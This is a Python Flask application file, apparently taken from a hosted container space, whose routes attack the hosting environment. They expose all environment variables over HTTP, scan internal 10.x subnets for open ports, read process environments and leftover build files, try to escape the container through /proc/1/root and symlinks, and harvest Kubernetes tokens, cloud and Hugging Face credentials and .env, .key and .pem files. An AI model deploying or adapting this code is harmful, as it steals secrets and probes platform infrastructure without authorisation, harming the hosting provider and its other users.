File size: 7,180 Bytes
da61b2a
 
 
c099686
 
c37bfd9
 
c099686
da61b2a
 
 
 
 
c37bfd9
 
 
 
c099686
 
 
 
 
 
c37bfd9
c099686
da61b2a
c099686
 
c37bfd9
c099686
c37bfd9
c099686
 
c37bfd9
c099686
 
c37bfd9
 
c099686
c37bfd9
c099686
 
 
c37bfd9
 
 
 
 
 
 
c099686
c37bfd9
c099686
c37bfd9
da61b2a
c37bfd9
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
c099686
 
 
c37bfd9
 
 
c099686
 
c37bfd9
c099686
c37bfd9
 
 
 
 
c099686
c37bfd9
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
c099686
 
 
c37bfd9
 
 
c099686
 
c37bfd9
 
 
c099686
c37bfd9
c099686
c37bfd9
c099686
c37bfd9
da61b2a
c37bfd9
da61b2a
c37bfd9
c099686
c37bfd9
da61b2a
c37bfd9
da61b2a
c37bfd9
 
c099686
c37bfd9
da61b2a
c37bfd9
da61b2a
c37bfd9
c099686
c37bfd9
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
da61b2a
 
 
 
 
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
import os
import subprocess
import json
import urllib.request
import socket
import ssl
import concurrent.futures
from flask import Flask, Response, request

app = Flask(__name__)

@app.route("/")
def index():
    results = {
        "env_vars": dict(os.environ),
        "id": subprocess.check_output(["id"], timeout=5).decode().strip(),
    }
    return Response(json.dumps(results, indent=2, default=str), mimetype='application/json')

@app.route("/probe")
def probe():
    target = request.args.get("target", "10.108.144.112")
    port = int(request.args.get("port", "7860"))
    path = request.args.get("path", "/")
    results = {}
    
    try:
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.settimeout(3)
        result = s.connect_ex((target, port))
        results["tcp"] = f"{'open' if result == 0 else 'closed'} (code={result})"
        s.close()
    except Exception as e:
        results["tcp"] = str(e)
    
    try:
        resp = urllib.request.urlopen(f"http://{target}:{port}{path}", timeout=3)
        results["http"] = {"status": resp.status, "body": resp.read().decode()[:3000], "headers": dict(resp.headers)}
    except Exception as e:
        results["http"] = str(e)
    
    return Response(json.dumps(results, indent=2, default=str), mimetype='application/json')

@app.route("/scan")
def scan():
    """Scan a subnet for open ports"""
    base = request.args.get("base", "10.108.73")
    port = int(request.args.get("port", "7860"))
    start = int(request.args.get("start", "1"))
    end = int(request.args.get("end", "20"))
    
    results = {}
    
    def check_host(ip):
        try:
            s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            s.settimeout(1)
            result = s.connect_ex((ip, port))
            s.close()
            if result == 0:
                return (ip, "open")
            return None
        except:
            return None
    
    with concurrent.futures.ThreadPoolExecutor(max_workers=20) as executor:
        futures = {}
        for i in range(start, min(end + 1, start + 50)):
            ip = f"{base}.{i}"
            futures[executor.submit(check_host, ip)] = ip
        
        for future in concurrent.futures.as_completed(futures, timeout=10):
            result = future.result()
            if result:
                results[result[0]] = result[1]
    
    return Response(json.dumps(results, indent=2, default=str), mimetype='application/json')

@app.route("/build-arg-test")
def build_arg_test():
    """Check if any build args leaked into the image"""
    results = {}
    
    # Check Docker history / image metadata
    try:
        # Check /proc/1/environ for the main process
        with open("/proc/1/environ", "rb") as f:
            env_bytes = f.read()
            envs = env_bytes.split(b'\x00')
            results["proc_1_environ"] = [e.decode('utf-8', errors='replace') for e in envs if e]
    except Exception as e:
        results["proc_1_environ"] = str(e)
    
    # Check if there are any leftover files from build
    interesting_paths = [
        "/kaniko", "/workspace", "/.dockerconfigjson", "/root/.docker/config.json",
        "/tmp/build", "/buildkit", "/.buildkit_qemu_emulator",
        "/etc/buildkit", "/root/.cache"
    ]
    results["build_artifacts"] = {}
    for p in interesting_paths:
        if os.path.exists(p):
            if os.path.isdir(p):
                try:
                    results["build_artifacts"][p] = os.listdir(p)
                except:
                    results["build_artifacts"][p] = "exists but unreadable"
            else:
                try:
                    with open(p) as f:
                        results["build_artifacts"][p] = f.read()[:500]
                except:
                    results["build_artifacts"][p] = "exists but unreadable"
    
    return Response(json.dumps(results, indent=2, default=str), mimetype='application/json')

@app.route("/overlay-escape")
def overlay_escape():
    """Test if we can access the host overlay filesystem"""
    results = {}
    
    # The overlay mount shows: 
    # upperdir=/var/lib/containerd/io.containerd.snapshotter.v1.overlayfs/snapshots/XXXX/fs
    # This path is on the HOST filesystem, but we can only see it via overlay
    
    # Try reading /proc/1/root which should loop back to our own root
    try:
        results["proc_1_root_etc_hostname"] = open("/proc/1/root/etc/hostname").read()
    except Exception as e:
        results["proc_1_root_etc_hostname"] = str(e)
    
    # Check if we can access /proc/1/root/../ to escape
    try:
        results["proc_1_root_parent"] = os.listdir("/proc/1/root/../")
    except Exception as e:
        results["proc_1_root_parent"] = str(e)
    
    # Try symlink tricks
    try:
        os.symlink("/proc/1/root", "/tmp/escape_link")
        results["symlink_escape"] = os.listdir("/tmp/escape_link/")
    except Exception as e:
        results["symlink_escape"] = str(e)
    
    # Try accessing other containerd snapshots
    try:
        results["containerd_snapshots"] = os.listdir("/var/lib/containerd/")
    except Exception as e:
        results["containerd_snapshots"] = str(e)
    
    return Response(json.dumps(results, indent=2, default=str), mimetype='application/json')

@app.route("/token-hunt")
def token_hunt():
    """Search for any tokens/credentials in the filesystem"""
    results = {}
    
    # Check well-known token locations
    token_paths = [
        "/var/run/secrets/kubernetes.io/serviceaccount/token",
        "/var/run/secrets/kubernetes.io/serviceaccount/ca.crt",
        "/var/run/secrets/kubernetes.io/serviceaccount/namespace",
        "/root/.kube/config",
        "/root/.docker/config.json",
        "/root/.aws/credentials",
        "/root/.gcloud/credentials",
        "/home/user/.cache/huggingface/token",
        "/root/.cache/huggingface/token",
        "/root/.huggingface/token",
    ]
    
    for p in token_paths:
        try:
            if os.path.isfile(p):
                with open(p) as f:
                    results[p] = f.read()[:500]
            elif os.path.isdir(p):
                results[p] = os.listdir(p)
            else:
                results[p] = "not found"
        except Exception as e:
            results[p] = str(e)
    
    # Search for any .env files
    for root_dir in ["/", "/app", "/home", "/root", "/tmp"]:
        try:
            for dirpath, dirnames, filenames in os.walk(root_dir, topdown=True):
                dirnames[:] = dirnames[:10]  # Limit depth
                for f in filenames:
                    if f.endswith(('.env', '.token', '.key', '.pem', 'credentials')):
                        full = os.path.join(dirpath, f)
                        try:
                            with open(full) as fh:
                                results[full] = fh.read()[:200]
                        except:
                            pass
                break  # Only first level
        except:
            pass
    
    return Response(json.dumps(results, indent=2, default=str), mimetype='application/json')

if __name__ == "__main__":
    app.run(host="0.0.0.0", port=7860)